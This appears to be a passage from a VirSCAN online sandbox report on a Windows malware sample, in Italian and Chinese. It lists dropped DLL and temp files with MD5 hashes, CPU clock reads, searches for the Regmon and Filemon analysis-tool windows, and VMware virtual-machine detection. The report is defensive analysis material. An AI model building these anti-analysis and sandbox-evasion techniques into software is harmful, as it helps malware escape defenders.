CursorPos = (17460,18717), SleepMilliseconds = 4000.
CursorPos = (19757,19896), SleepMilliseconds = 4000.
Descrizione del comportamento:可执行文件MD5
Per ulteriori informazioni:C:\WINDOWS\Sockee.dll ---> 830e42a11083d10c5968ebdc764e1620
C:\Documents and Settings\Administrator\Local Settings\%temp%\万能公式.dll ---> 文件过大!
C:\Documents and Settings\Administrator\Local Settings\Temp\~temp.4 ---> c578b6820bda5689940560147c6e5ffc
C:\Documents and Settings\Administrator\Local Settings\%temp%\SoftXLic.dll ---> 241b5d6679069042b5456e691a3a8e32
C:\Documents and Settings\Administrator\Local Settings\Temp\~temp.10 ---> fe1d0ee5901dd167ee9b28eece31786c
C:\Documents and Settings\Administrator\Local Settings\Temp\~temp.11 ---> fe1d0ee5901dd167ee9b28eece31786c
Descrizione del comportamento:直接获取CPU时钟
Per ulteriori informazioni:EAX = 0xdf800350, EDX = 0x000000bb
EAX = 0xdf80039c, EDX = 0x000000bb
EAX = 0xdf8003e8, EDX = 0x000000bb
EAX = 0xdf800434, EDX = 0x000000bb
EAX = 0xdf800480, EDX = 0x000000bb
EAX = 0xdf8004cc, EDX = 0x000000bb
EAX = 0xdf800518, EDX = 0x000000bb
EAX = 0xdf800564, EDX = 0x000000bb
EAX = 0xdf8005b0, EDX = 0x000000bb
EAX = 0xdf8005fc, EDX = 0x000000bb
Descrizione del comportamento:查找反病毒常用工具窗口
Per ulteriori informazioni:NtUserFindWindowEx: [Class,Window] = [Regmonclass,]
NtUserFindWindowEx: [Class,Window] = [Filemonclass,]
Descrizione del comportamento:VMWare特殊指令检测虚拟机
Per ulteriori informazioni:N/A
Esegui screenshot
VirSCAN

A proposito di VirSCAN | Tutela della privacy | Contattaci | Collegamento amichevole | Aiuta VirSCAN
Tradotto da Riccardo Vianello, Italia
Powered By CentOSpol

京ICP备11007605号-12

pol

京公网安备 11010802020746号